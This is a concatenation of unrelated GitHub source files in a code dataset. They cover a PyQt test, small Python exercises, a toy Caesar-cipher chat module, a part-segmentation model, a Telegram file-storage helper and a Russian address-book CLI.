0,\n \"action\": \"Ok\"\n }\n )\n\n @patch('itasks.itasks_service.ItasksService')\n @patch('PyQt5.QtWidgets.QLineEdit.text', return_value='kaas')\n def test_textbox_changed_event(self, text_function, itasks_service):\n \"\"\"\n method: textbox_changed_event\n state: text changed\n expected_result: itasks_service.send_ui_event called with correct data\n \"\"\"\n # Assign\n qlineedit = Mock()\n qlineedit.text = text_function\n textbox = Mock()\n textbox.qwidget = qlineedit\n textbox.task_id = \"2-1\"\n textbox.editor_id = \"v\"\n\n # Act\n QtEventHandler.textbox_changed_event(textbox)\n\n # Asserts\n itasks_service._ItasksService__instance.send_ui_event.\\\n assert_called_once_with(\n {\n \"instanceNo\": 2,\n \"taskNo\": 1,\n \"edit\": \"v\",\n \"value\": \"kaas\"\n }\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"tbeuzenberg/iTasks","sub_path":"test/test_qt_event_handler/test_qt_event_handler.py","file_name":"test_qt_event_handler.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19693746942","text":"#taking x as input; it will default in string\r\nx = input(\"Enter a three digit number from 001-999\")\r\n#taking two variable and listing them x\r\ny = list(x)\r\nz = list(x)\r\nk = int(x)\r\nif int(k) <= 0 or int(k) >= 999:\r\n print(\"Hey idiot! You were told to type a three digit number from 001-999\")\r\n exit(1)\r\n#changing the characters\r\ny[0]=x[2]\r\ny[1]=x[1]\r\ny[2]=x[0]\r\n#taking two variable for sentences to join them\r\nori = \"Original Value =\"\r\nrev = \":) Reversed value =\"\r\n#taking two variables to map and remove brackets & commas of the listed numbers\r\nm = ''. join(map(str, z))\r\nn = ''. join(map(str, y))\r\n#printing both sentences and values\r\nprint(ori, m)\r\nprint(rev, n)\r\n","repo_name":"SNV-008/-Hello_World-_This_is_my_first_repositery","sub_path":"Swapping digits of a number.py","file_name":"Swapping digits of a number.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"36590024238","text":"\"\"\"\r\nThis module uses a caesar shift to encrypt messages\r\nThere is a dynamic key that is picked at random\r\nThe key is shared between clients using metadata messages that are not encrypted\r\nIt is very easy to hack (slightly better than v1.0 though)\r\n\"\"\"\r\n\r\nkey = None\r\n\r\n\r\ndef send(message):\r\n \"\"\"Applies encryption and adds any metadata to a message\"\"\"\r\n global key, printable\r\n if key is None:\r\n key = random(1, len(printable))\r\n ciphertext = encrypt(message, key)\r\n mercury_server_send(ciphertext)\r\n\r\n\r\ndef receive(message):\r\n \"\"\"Removes any encryption and metadata from a message\"\"\"\r\n global key\r\n if message.startswith('$key:'):\r\n if key is None:\r\n key = int(message[5:])\r\n success('Got key!')\r\n elif message.startswith('$requestkey'):\r\n if key is not None:\r\n mercury_server_send('$key:%d' % key)\r\n else:\r\n plaintext = decrypt(message, key)\r\n mercury_display(plaintext)\r\n\r\n\r\ndef init():\r\n \"\"\"Initialises the module so it ready to processes messages\"\"\"\r\n mercury_server_send('$requestkey')\r\n","repo_name":"WilliamMayor/mercury","sub_path":"modules/Billy/shift/v2.0/comms.py","file_name":"comms.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16583837884","text":"import xlwings as xw\r\n\r\nTEXT_WIDTH = 40 #How many characters in Each Line\r\nDIGITS = 3 # how many digits to be shown while calculating averages and %age\r\n\r\n\r\nsheet = xw.Book('test.xlsx').sheets[0] #Name of the excel sheet having the data\r\n\r\narr = sheet.range('A2:A99').value # The range of the data column\r\n\r\npure = []\r\nSum = 0\r\ncount = 0\r\n\r\n\r\ndef is_number(s):\r\n try:\r\n float(s)\r\n return True\r\n except ValueError:\r\n return False\r\n\r\n\r\n \r\nfor i in arr:\r\n if i != None:\r\n if is_number(i):\r\n Sum+=float(i)\r\n count+=1\r\n pure.append(i)\r\npure.sort()\r\nperc = {}\r\nfor i in pure:\r\n\r\n \r\n if i in perc.keys():\r\n perc[i]+=1\r\n else:\r\n perc[i] = 1\r\ndata = []\r\nkeys = list(perc.keys())\r\n\r\nMax = keys[0]\r\nMin = keys[0]\r\nprint(\"DETAILED BREAKDOWN\")\r\nprint()\r\n\r\nfor i in perc:\r\n if perc[i]>perc[Max]:\r\n Max = i\r\n if perc[i]<perc[Min]:\r\n Min = i\r\n data.append((str(i),str(perc[i]),str((perc[i]/count)*100)[:1+DIGITS]))\r\n \r\n\r\n\r\n \r\n\r\ndata1 = [['VALUE'],['No. of entries'],['% of total entries']]\r\ncolumns = []\r\n\r\nfor i in data1:\r\n columns.append(i[0])\r\nwidth = [0,0,0]\r\ndata.insert(0,tuple(columns))\r\n\r\nfor row in data:\r\n t = 0\r\n for column in row:\r\n if width[t] < len(str(column)):\r\n width[t] = len(str(column))\r\n t+=1\r\n \r\nfor row in data:\r\n t=0\r\n \r\n for column in row:\r\n x = width[t]\r\n \r\n for i in str(column):\r\n print (i,end = '')\r\n x-=1\r\n \r\n while x != 0:\r\n print(' ',end = '')\r\n x-=1\r\n t+=1\r\n print(' | ',end ='') \r\n print()\r\nprint()\r\nprint('Average :',str((Sum/count))[:2+DIGITS])\r\nprint()\r\n\r\nmid = len(pure) // 2\r\nres = (pure[mid] + pure[~mid]) / 2\r\nprint(\"Median : \" + str(res))\r\nprint()\r\n\r\nprint('Maximum %age at ',Max,' With %age',str((perc[Max]/count)*100)[:1+DIGITS])\r\nprint('Minimum %age at ',Min,' With %age',str((perc[Min]/count)*100)[:1+DIGITS])\r\n\r\n","repo_name":"Amogh-Walia/Data-Analyser","sub_path":"Data Breakdown.py","file_name":"Data Breakdown.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72088716322","text":"import os\nimport logging\nimport torch\nimport numpy as np\nimport detectron2.utils.comm as comm\nimport wandb\n\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom typing import Tuple, Union, Any, List\nfrom detectron2.config import configurable\nfrom detectron2.data import MetadataCatalog\nfrom detectron2.modeling import META_ARCH_REGISTRY, build_backbone, build_sem_seg_head\nfrom detectron2.modeling.backbone import Backbone\nfrom detectron2.modeling.postprocessing import sem_seg_postprocess\nfrom detectron2.structures import ImageList, Instances\nfrom detectron2.utils.memory import retry_if_cuda_oom\nfrom detectron2.data.detection_utils import read_image\nfrom detectron2.utils.visualizer import ColorMode\nfrom .modeling.criterion import SetCriterion\nfrom .modeling.matcher import HungarianMatcher\nfrom .utils.utils import Partvisualizer, get_iou_all_cocoapi\n\n\n@META_ARCH_REGISTRY.register()\nclass ProposalModel(nn.Module):\n \"\"\"\n Proposal model trained with pseudo-labels based on Mask2Former.\n \"\"\"\n\n @configurable\n def __init__(\n self,\n *,\n backbone: Backbone,\n sem_seg_head: nn.Module,\n criterion: nn.Module,\n num_queries: int,\n num_classes: int,\n size_divisibility: int,\n pixel_mean: Tuple[float],\n pixel_std: Tuple[float],\n test_topk_per_image: int,\n dataset_name: str=\"\",\n # wandb\n use_wandb: bool=True,\n wandb_vis_period_train: int=200,\n wandb_vis_period_test: int=20,\n wandb_vis_topk: int=200,\n use_unique_per_pixel_label: bool=False,\n minimum_pseudo_mask_score: float=0.0,\n minimum_pseudo_mask_ratio: float=0.0,\n apply_masking_with_object_mask: bool=True,\n ):\n super().__init__()\n self.backbone = backbone\n self.sem_seg_head = sem_seg_head\n self.criterion = criterion\n self.num_queries = num_queries\n self.num_classes = num_classes\n if size_divisibility < 0:\n # use backbone size_divisibility if not set\n size_divisibility = self.backbone.size_divisibility\n self.size_divisibility = size_divisibility\n self.register_buffer(\"pixel_mean\", torch.Tensor(pixel_mean).view(-1, 1, 1), False)\n self.register_buffer(\"pixel_std\", torch.Tensor(pixel_std).view(-1, 1, 1), False)\n self.test_topk_per_image = test_topk_per_image\n self.cpu_device = torch.device(\"cpu\")\n self.metadata = MetadataCatalog.get(dataset_name)\n self.logger = logging.getLogger(\"part_distillation\")\n\n # wandb\n self.use_wandb = use_wandb\n self.wandb_vis_period_train = wandb_vis_period_train\n self.wandb_vis_period_test = wandb_vis_period_test\n self.wandb_vis_topk = wandb_vis_topk\n self.num_train_iterations = 0\n self.num_test_iterations = 0\n\n self.use_unique_per_pixel_label = use_unique_per_pixel_label\n self.minimum_pseudo_mask_score = minimum_pseudo_mask_score\n self.minimum_pseudo_mask_ratio = minimum_pseudo_mask_ratio\n self.apply_masking_with_object_mask = apply_masking_with_object_mask\n\n\n def set_postprocess_type(self, postprocess_type):\n if postprocess_type == \"semseg\":\n self.use_unique_per_pixel_label = True\n elif postprocess_type == \"prop\":\n self.use_unique_per_pixel_label = False\n elif postprocess_type == \"prop-filtered\":\n self.use_unique_per_pixel_label = False\n self.minimum_pseudo_mask_score = 0.3\n\n def reset_postprocess_type(self, flag, score_thres):\n self.use_unique_per_pixel_label = flag\n self.minimum_pseudo_mask_score = score_thres\n\n\n @classmethod\n def from_config(cls, cfg):\n backbone = build_backbone(cfg)\n sem_seg_head = build_sem_seg_head(cfg, backbone.output_shape())\n\n # Loss parameters:\n deep_supervision = cfg.MODEL.MASK_FORMER.DEEP_SUPERVISION\n no_object_weight = cfg.MODEL.MASK_FORMER.NO_OBJECT_WEIGHT\n\n # loss weights\n class_weight = cfg.MODEL.MASK_FORMER.CLASS_WEIGHT\n dice_weight = cfg.MODEL.MASK_FORMER.DICE_WEIGHT\n mask_weight = cfg.MODEL.MASK_FORMER.MASK_WEIGHT\n\n # building criterion\n matcher = HungarianMatcher(\n cost_class=class_weight,\n cost_mask=mask_weight,\n cost_dice=dice_weight,\n num_points=cfg.MODEL.MASK_FORMER.TRAIN_NUM_POINTS,\n )\n\n weight_dict = {\"loss_ce\": class_weight, \"loss_mask\": mask_weight, \"loss_dice\": dice_weight}\n\n if deep_supervision:\n dec_layers = cfg.MODEL.MASK_FORMER.DEC_LAYERS\n aux_weight_dict = {}\n for i in range(dec_layers - 1):\n aux_weight_dict.update({k + f\"_{i}\": v for k, v in weight_dict.items()})\n weight_dict.update(aux_weight_dict)\n\n losses = [\"labels\", \"masks\"]\n\n criterion = SetCriterion(\n sem_seg_head.num_classes,\n matcher=matcher,\n weight_dict=weight_dict,\n eos_coef=no_object_weight,\n losses=losses,\n num_points=cfg.MODEL.MASK_FORMER.TRAIN_NUM_POINTS,\n oversample_ratio=cfg.MODEL.MASK_FORMER.OVERSAMPLE_RATIO,\n importance_sample_ratio=cfg.MODEL.MASK_FORMER.IMPORTANCE_SAMPLE_RATIO,\n )\n\n return {\n \"backbone\": backbone,\n \"sem_seg_head\": sem_seg_head,\n \"criterion\": criterion,\n \"num_queries\": cfg.MODEL.MASK_FORMER.NUM_OBJECT_QUERIES,\n \"size_divisibility\": cfg.MODEL.MASK_FORMER.SIZE_DIVISIBILITY,\n \"pixel_mean\": cfg.MODEL.PIXEL_MEAN,\n \"pixel_std\": cfg.MODEL.PIXEL_STD,\n \"num_classes\": cfg.MODEL.SEM_SEG_HEAD.NUM_CLASSES,\n # wandb\n \"wandb_vis_period_train\": cfg.WANDB.VIS_PERIOD_TRAIN,\n \"wandb_vis_period_test\": cfg.WANDB.VIS_PERIOD_TEST,\n \"wandb_vis_topk\": cfg.WANDB.VIS_TOPK,\n \"use_wandb\": not cfg.WANDB.DISABLE_WANDB,\n \"dataset_name\": cfg.DATASETS.TRAIN[0],\n # inference\n \"test_topk_per_image\": cfg.TEST.DETECTIONS_PER_IMAGE,\n \"use_unique_per_pixel_label\": cfg.PROPOSAL_LEARNING.USE_PER_PIXEL_LABEL,\n \"apply_masking_with_object_mask\": cfg.PROPOSAL_LEARNING.APPLY_MASKING_WITH_OBJECT_MASK,\n \"minimum_pseudo_mask_ratio\": cfg.PROPOSAL_LEARNING.MIN_AREA_RATIO,\n \"minimum_pseudo_mask_score\": cfg.PROPOSAL_LEARNING.MIN_SCORE,\n }\n\n\n @property\n def device(self):\n return self.pixel_mean.device\n\n def forward(self, batched_inputs):\n # assert \"instances\" in batched_inputs[0], \"gt should always be present. \"\n images = [x[\"image\"].to(self.device) for x in batched_inputs]\n images = [(x - self.pixel_mean) / self.pixel_std for x in images]\n images = ImageList.from_tensors(images, self.size_divisibility)\n\n features = self.backbone(images.tensor)\n targets = self.prepare_targets(batched_inputs, images)\n outputs = self.sem_seg_head(features)\n\n if self.training:\n # bipartite matching-based loss\n losses = self.criterion(outputs, targets)\n\n for k in list(losses.keys()):\n if k in self.criterion.weight_dict:\n losses[k] *= self.criterion.weight_dict[k]\n else:\n # remove this loss if not specified in `weight_dict`\n losses.pop(k)\n\n if self.use_wandb and comm.is_main_process():\n if self.num_train_iterations % self.wandb_vis_period_train == 0:\n processed_results_vis = self.inference(batched_inputs, targets, images, outputs, vis=True)\n self.wandb_visualize(batched_inputs, images, processed_results_vis, is_training=True)\n del processed_results_vis\n self.num_train_iterations += 1\n return losses\n else:\n processed_results = self.inference(batched_inputs, targets, images, outputs, vis=False)\n if self.use_wandb and comm.is_main_process():\n if self.num_test_iterations % self.wandb_vis_period_test == 0:\n processed_results_vis = self.inference(batched_inputs, targets, images, outputs, vis=True)\n self.wandb_visualize(batched_inputs, images, processed_results_vis, is_training=False)\n del processed_results_vis\n self.num_test_iterations += 1\n\n del batched_inputs, features, outputs, targets\n torch.cuda.empty_cache()\n\n return processed_results\n\n\n def inference(self, batched_inputs, targets, images, outputs, vis=False):\n mask_cls_results = outputs[\"pred_logits\"]\n mask_pred_results = outputs[\"pred_masks\"]\n\n # upsample masks\n mask_pred_results = F.interpolate(\n mask_pred_results,\n size=(images.tensor.shape[-2], images.tensor.shape[-1]),\n mode=\"bilinear\",\n align_corners=False,\n )\n\n processed_results = []\n for batch_idx, (mask_cls_result, mask_pred_result, target, input_per_image, image_size) in enumerate(zip(\n mask_cls_results, mask_pred_results, targets, batched_inputs, images.image_sizes\n )):\n # NOTE: Unlike standard pipeline, we provide gt label as input for inference.\n # This reshapes the labels to input size already, so we want to reshape\n # both gts and predictions to the original image size.\n height = input_per_image.get(\"height\", image_size[0])\n width = input_per_image.get(\"width\", image_size[1])\n\n # print(\"During inference: \", height, width, image_size, target[\"masks\"].shape, mask_pred_result.shape, flush=True)\n mask_pred_result = retry_if_cuda_oom(sem_seg_postprocess)(mask_pred_result, image_size, height, width)\n target_masks = retry_if_cuda_oom(sem_seg_postprocess)(target[\"masks\"].float(), image_size, height, width).bool()\n target_object_masks = retry_if_cuda_oom(sem_seg_postprocess)(target[\"object_masks\"].float(), image_size, height, width).bool()\n mask_cls_result = mask_cls_result.to(mask_pred_result)\n\n processed_results.append({})\n instance_r = self.instance_inference(mask_cls_result, mask_pred_result, target_masks, target_object_masks, target[\"labels\"], vis=vis)\n target_inst = Instances(target_masks.shape[-2:])\n target_inst.gt_masks = target_masks\n target_inst.gt_classes = target[\"labels\"]\n\n # For visualization\n target_inst.pred_masks = target_masks\n target_inst.pred_classes = target[\"labels\"]\n\n processed_results[-1][\"proposals\"] = instance_r\n processed_results[-1][\"gt_masks\"] = target_inst\n\n\n return processed_results\n\n\n\n\n def _unique_assignment(self, masks_per_image, scores_per_image):\n obj_map_per_image = masks_per_image.topk(1, dim=0)[0] > 0.\n if self.use_unique_per_pixel_label:\n binmask_per_image = masks_per_image > 0\n predmask_per_image = scores_per_image[:, None, None] * masks_per_image.sigmoid()\n\n scoremap_per_image = predmask_per_image.topk(1, dim=0)[1]\n query_indexs_list = scoremap_per_image.unique()\n newmasks_per_image = masks_per_image.new_zeros(len(query_indexs_list), *scoremap_per_image.shape[1:])\n for i, cid in enumerate(query_indexs_list):\n newmasks_per_image[i] = (scoremap_per_image == cid) & obj_map_per_image\n scores_per_image = scores_per_image[query_indexs_list]\n loc_valid_idxs = newmasks_per_image.flatten(1).sum(dim=1) / obj_map_per_image.flatten(1).sum(dim=1) > self.minimum_pseudo_mask_ratio\n if loc_valid_idxs.any():\n newmasks_per_image = newmasks_per_image[loc_valid_idxs]\n scores_per_image = scores_per_image[loc_valid_idxs]\n\n loc_valid_idxs = scores_per_image > self.minimum_pseudo_mask_score\n if loc_valid_idxs.any():\n newmasks_per_image = newmasks_per_image[loc_valid_idxs]\n scores_per_image = scores_per_image[loc_valid_idxs]\n\n return newmasks_per_image.bool(), scores_per_image\n\n else:\n loc_valid_idxs = (masks_per_image > 0).flatten(1).sum(dim=1) / obj_map_per_image.flatten(1).sum(dim=1) > self.minimum_pseudo_mask_ratio\n if loc_valid_idxs.any():\n masks_per_image = masks_per_image[loc_valid_idxs]\n scores_per_image = scores_per_image[loc_valid_idxs]\n\n loc_valid_idxs = scores_per_image > self.minimum_pseudo_mask_score\n if loc_valid_idxs.any():\n masks_per_image = masks_per_image[loc_valid_idxs]\n scores_per_image = scores_per_image[loc_valid_idxs]\n\n return (masks_per_image > 0), scores_per_image\n\n\n\n def prepare_targets(self, inputs, images):\n if self.training:\n return self._prepare_pseudo_targets(inputs, images)\n else:\n return self._prepare_gt_targets(inputs, images)\n\n\n def _prepare_pseudo_targets(self, inputs, images):\n \"\"\"\n This is used when training with ImageNet.\n \"\"\"\n pseudo_targets = [x[\"instances\"].to(self.device) for x in inputs]\n h_pad, w_pad = images.tensor.shape[-2:]\n new_targets = []\n for input_per_image, pseudo_targets_per_image in zip(inputs, pseudo_targets):\n if pseudo_targets_per_image.has(\"gt_masks\"):\n gt_pseudo_masks = pseudo_targets_per_image.gt_masks.tensor\n padded_pseudo_masks = torch.zeros((gt_pseudo_masks.shape[0], h_pad, w_pad),\n dtype=gt_pseudo_masks.dtype, device=gt_pseudo_masks.device)\n padded_pseudo_masks[:, : gt_pseudo_masks.shape[1], : gt_pseudo_masks.shape[2]] = gt_pseudo_masks\n n = padded_pseudo_masks.shape[0]\n\n # During training with ImageNet, we assume each image has only one object.\n object_masks = padded_pseudo_masks.sum(0, keepdim=True)\n new_targets.append({\"labels\": torch.zeros(n).long().to(self.device), # All-zeros\n \"masks\": padded_pseudo_masks,\n \"object_masks\": object_masks,\n # \"gt_object_class\": input_per_image[\"gt_object_class\"],\n })\n else:\n raise ValueError(\"pseudo label without masks.\")\n\n return new_targets\n\n\n\n def _prepare_gt_targets(self, inputs, images):\n targets = [x[\"part_instances\"].to(self.device) for x in inputs]\n object_targets = [x[\"instances\"].to(self.device) for x in inputs]\n\n h_pad, w_pad = images.tensor.shape[-2:]\n new_targets = []\n for object_targets_per_image, targets_per_image in zip(object_targets, targets):\n gt_mask = targets_per_image.gt_masks.tensor\n padded_masks = torch.zeros((gt_mask.shape[0], h_pad, w_pad),\n dtype=gt_mask.dtype, device=gt_mask.device)\n padded_masks[:, : gt_mask.shape[1], : gt_mask.shape[2]] = gt_mask\n n = padded_masks.shape[0]\n\n gt_obj_mask = object_targets_per_image.gt_masks.tensor\n padded_obj_masks = torch.zeros((gt_obj_mask.shape[0], h_pad, w_pad),\n dtype=gt_obj_mask.dtype, device=gt_obj_mask.device)\n padded_obj_masks[:, : gt_obj_mask.shape[1], : gt_obj_mask.shape[2]] = gt_obj_mask\n\n labels = targets_per_image.gt_classes.to(self.device)\n new_targets.append({\"labels\": labels,\n \"masks\": padded_masks,\n # \"gt_object_class\": object_targets_per_image.gt_classes.to(self.device),\n \"object_masks\": padded_obj_masks,\n })\n\n return new_targets\n\n\n\n def masking_with_object_mask(self, masks_per_image, target_masks):\n if self.apply_masking_with_object_mask:\n object_target_mask = target_masks.sum(dim=0, keepdim=True).bool()\n\n return masks_per_image * object_target_mask\n else:\n return masks_per_image\n\n\n def instance_inference(self, mask_cls, mask_pred, target_masks, target_object_masks, target_labels, vis=False):\n # mask_pred is already processed to have the same shape as original input\n image_size = mask_pred.shape[-2:]\n\n # [Q, K=1]\n topk = self.wandb_vis_topk if vis and not self.use_unique_per_pixel_label else self.test_topk_per_image\n scores = mask_cls.softmax(-1)[:, :-1]\n\n scores = scores.topk(1, dim=1)[0].flatten() # Use the top confidence score. (proposal eval only.)\n scores_per_image, topk_indices = scores.topk(topk, sorted=False)\n mask_pred = mask_pred[topk_indices]\n\n mask_pred = self.masking_with_object_mask(mask_pred, target_object_masks)\n mask_pred_bool, scores_per_image = self._unique_assignment(mask_pred, scores_per_image)\n\n mask_pred_bool, scores_per_image, gt_part_labels = \\\n self.match_gt_labels(mask_pred_bool, scores_per_image, target_masks, target_labels)\n\n if mask_pred_bool.shape[0] == 0:\n # doesn't contribute to the evaluation.\n mask_pred_bool = mask_pred.new_zeros(1, *mask_pred.shape[1:]).bool()\n scores_per_image = scores_per_image.new_zeros(1)\n gt_part_labels = gt_part_labels.new_zeros(1)\n\n result = Instances(image_size)\n # mask (before sigmoid)\n result.pred_masks = mask_pred_bool\n pred_masks_float = result.pred_masks.float()\n result.pred_classes = gt_part_labels # not used (vis only)\n result.scores = scores_per_image\n\n return result\n\n def register_metadata(self, dataset_name):\n self.logger.info(\"{} is registered for evaluation.\".format(dataset_name))\n self.metadata = MetadataCatalog.get(dataset_name)\n\n\n def match_gt_labels(self, masks_per_image, scores_per_image, target_masks, target_labels):\n pairwise_mask_ious = get_iou_all_cocoapi(masks_per_image, target_masks)\n\n top1_ious, top1_idx = pairwise_mask_ious.topk(1, dim=1)\n\n top1_idx = top1_idx.flatten()\n fg_idxs = (top1_ious > 0.001).flatten()\n\n gt_part_labels = target_labels[top1_idx[fg_idxs]]\n masks_per_image = masks_per_image[fg_idxs]\n scores_per_image = scores_per_image[fg_idxs]\n\n return masks_per_image, scores_per_image, gt_part_labels\n\n\n\n def match_semseg_gt_labels(self, masks_per_image, scores_per_image, prop_feats_per_image, target_masks, target_labels):\n pairwise_mask_ious = get_iou_all_cocoapi(masks_per_image, target_masks)\n\n top1_ious, top1_idx = pairwise_mask_ious.topk(1, dim=1)\n\n top1_idx = top1_idx.flatten()\n fg_idxs = (top1_ious > 0.001).flatten()\n\n gt_part_labels = target_labels[top1_idx[fg_idxs]]\n masks_per_image = masks_per_image[fg_idxs]\n scores_per_image = scores_per_image[fg_idxs]\n prop_feats_per_image = prop_feats_per_image[fg_idxs]\n\n return masks_per_image, scores_per_image, prop_feats_per_image, gt_part_labels\n\n\n\n def wandb_visualize(self, inputs, images, processed_results, is_training, opacity=0.8):\n # NOTE: Hack to use input as visualization image.\n images_raw = [x[\"image\"].float().to(self.cpu_device) for x in inputs]\n images_vis = [retry_if_cuda_oom(sem_seg_postprocess)(img, img_sz, x.get(\"height\", img_sz[0]), x.get(\"width\", img_sz[1]))\n for img, img_sz, x in zip(images_raw, images.image_sizes, inputs)]\n images_vis = [img.to(self.cpu_device) for img in images_vis]\n result_vis = [r[\"proposals\"].to(self.cpu_device) for r in processed_results]\n target_vis = [r[\"gt_masks\"].to(self.cpu_device) for r in processed_results]\n image, instances, targets = images_vis[0], result_vis[0], target_vis[0]\n image = image.permute(1, 2, 0).to(torch.uint8)\n white = np.ones(image.shape) * 255\n image = image * opacity + white * (1-opacity)\n\n metadata = self.metadata if not is_training else None\n visualizer = Partvisualizer(image, metadata, instance_mode=ColorMode.IMAGE)\n vis_output = visualizer.draw_instance_predictions(predictions=instances)\n\n image_pd = wandb.Image(vis_output.get_image())\n wandb.log({\"predictions\": image_pd})\n\n visualizer = Partvisualizer(image, metadata, instance_mode=ColorMode.IMAGE)\n vis_output = visualizer.draw_instance_predictions(predictions=targets)\n\n image_gt = wandb.Image(vis_output.get_image())\n wandb.log({\"ground_truths\": image_gt})\n","repo_name":"facebookresearch/PartDistillation","sub_path":"part_distillation/proposal_model.py","file_name":"proposal_model.py","file_ext":"py","file_size_in_byte":20936,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"54"} +{"seq_id":"12088455267","text":"import math\n\nclass Ember:\n def __init__(self, Eletkor = 0, magassag = 0, Tudasszint = 0, Nem = \"\", Csaladnev = \"\", Keresztnev = \"\", testsuly = \"\"):\n self.Eletkor = Eletkor\n self.magassag = magassag\n self.Tudasszint = Tudasszint\n self.Nem = Nem\n self.Csaladnev = Csaladnev\n self.Keresztnev = Keresztnev\n self.testsuly = testsuly\n\n def BMI(self):\n BMI = round(self.testsuly/((self.magassag/100)*(self.magassag/100)))\n return BMI\n\n def IQ(self):\n IQ = round((self.Eletkor/self.Tudasszint)*100)\n return IQ\n\n def Kiir(self):\n return print(\"Nemed:\", self.Nem, \", Neved:\", self.Csaladnev + \" \" + self.Keresztnev,\n \", Életkorod:\", self.Eletkor, \"év, Testmagasságod: \", self.magassag,\", testtömeged: \", self.testsuly,\n \"kg, A BMI indexed:\", self.BMI(),\n \", IQ-d:\", self.IQ())\n\n","repo_name":"FoszlerDanielA/doga001","sub_path":"ember_o.py","file_name":"ember_o.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25416173252","text":"from functools import reduce\nimport json\nimport pyrogram\nfrom utils.files import files\nimport os\nimport time\n\nclass telegram:\n\n creds = {}\n app = None\n\n def __init__(self) -> None:\n self.creds = telegram.getCreds(self)\n self.app = pyrogram.Client(\"my_account\", self.creds[\"id\"], self.creds[\"hash\"])\n\n \n def getCreds(self) -> dict:\n if(not os.path.exists(\"./data/creds.json\")):\n print(\"You need to get your own Telegram Api id and hash\")\n print('''\n \n 1.Go to https://my.telegram.org/auth and Login to your Telegram account with the phone number of the developer account to use.\n 2.Click under API Development tools.\n 3.A Create new application window will appear. Fill in your application details. There is no need to enter any URL, and only the first two fields (App title and Short name) can currently be changed later.\n 4. Click on Create application at the end. Remember that your API hash is secret and Telegram won’t let you revoke it. Don’t post it anywhere!\n\n ''')\n id = input(\"Enter your API id: \")\n hash = input(\"Enter your API hash: \")\n f = open(\"./data/creds.json\", \"w\")\n x = {\n \"id\": id,\n \"hash\" : hash\n }\n f.write(files.toJSON(x))\n f.close\n app = pyrogram.Client(\"my_account\", id, hash)\n with app:\n app.send_message(\"me\",\"Welcome to Tdrive!! You have been Successfully authenticated and now you can use Tdrive to store all your Files for free.\")\n\n \n f = open(\"./data/creds.json\", \"r\")\n d = json.loads(f.read())\n return d\n\n def sendDocument(self,path) -> str:\n app = self.app\n with app:\n app.send_document(\"me\",path,progress=telegram.progress)\n for x in app.get_chat_history(\"me\",1):\n return str(x.document.file_id)\n\n def downloadDocument(self,fileid,filename):\n app = self.app\n with app:\n app.download_media(fileid,\"./downloads/\"+ filename,progress=telegram.progress)\n\n \n def progress(current, total):\n if(total == 0): return\n print(\"\\r\" + f\"Progress: {current * 100 / total:.1f}%\",end=\"\")","repo_name":"RealNethical/Tdrive","sub_path":"utils/telegram.py","file_name":"telegram.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"72574710881","text":"from bl_lower import *\n\n\"\"\"\nЗдесь функция вывода времени и типа сообщения\n\"\"\"\n\n\ndef ti_and_inf():\n text = '\\033[32m Info\\033[0m'\n return f'\\033[33m{t_now()}\\033[0m ' + text + ': '\n\n\ndef ti_and_war():\n text = '\\033[31m Error\\033[0m'\n return f'\\033[33m{t_now()}\\033[0m ' + text + ': '\n\n\ndef ti_and_you():\n text = '\\033[34m Your\\033[0m'\n return f'\\033[33m{t_now()}\\033[0m ' + text + ': '\n\n\n\"\"\"\nФункции вывода сообщений\n\"\"\"\n\n\ndef welcome():\n print(f'{ti_and_inf()} Программа запущена и готова к работе!')\n\n\ndef reminder():\n print(f' Выберите следующее действие (help - Вывести команды):')\n\n\ndef goodbye():\n print(f'{ti_and_inf()} Работа программы завершена!')\n\n\n\"\"\"\nФункции вывода информации о командах\n\"\"\"\n\n\ndef book_com_info():\n print(f'{ti_and_inf()} open - Открыть адресную книгу\\n'\n f' list - Вывести список достпуных книг\\n' \n f' now - Создать адресную книгу\\n'\n f' rem - Удалить адресную книгу\\n'\n f' book - Открыть папку с конвертированными файлами\\n' \n f' stop - Завершение работы')\n\n\ndef contact_com_info():\n print(f'{ti_and_inf()} add - Добавить контакт\\n'\n f' del - Удалить контакт\\n'\n f' read - Вывести весь список контактов\\n'\n f' search - Поиск контакта в книге\\n'\n f' edit - Редактировать контакт в книге\\n'\n f' change - Cменить адресную книгу\\n'\n f' convert - Конвертировать адресную книгу\\n'\n f' book - Открыть папку с конвертированными файлами\\n' \n f' stop - Завершение работы')\n\n\n\"\"\"\nРабота с адресными книг��ми.\n\"\"\"\n\n\ndef book():\n print(f'{ti_and_inf()} Необходимо выбрать адресную книгу:')\n book_com_info()\n while True:\n com = input(f'{blu.ti_and_you()} > ')\n result_b = input_com_book(com)\n if result_b == 'stop':\n return False\n elif not result_b:\n continue\n else:\n return result_b\n\n\n# проверка команды и исполнение\ndef input_com_book(var):\n if var == 'stop':\n return var\n\n elif var == 'open':\n if list_books():\n print(f'{ti_and_inf()} Введите имя адресной книги:\\n'\n f' break - Отменить открытие адресной книги')\n name = input(f'{ti_and_you()} > ')\n if name == 'stop':\n return name\n elif name == 'break':\n print(f'{ti_and_inf()} Вы отменили открытие адресной книги!')\n reminder()\n return\n elif name == '':\n print(f'{ti_and_inf()} Имя контактной книги не может быть пустым')\n reminder()\n return\n buff = open_books(name)\n if buff == 'stop':\n return buff\n elif buff:\n return name\n else:\n reminder()\n\n elif var == 'now':\n print(f'{ti_and_inf()} Введите имя адресной книги:\\n'\n f' break - отменить создание адресной книги')\n name = input(f'{ti_and_you()} > ')\n if name == 'stop':\n return name\n elif name == 'break':\n print(f'{ti_and_inf()} Вы отменили добавление адресной книги!')\n reminder()\n return\n elif name == '':\n print(f\"{ti_and_war()} Вы не ввели имя адресной книги, попробуйте еще раз!\")\n reminder()\n 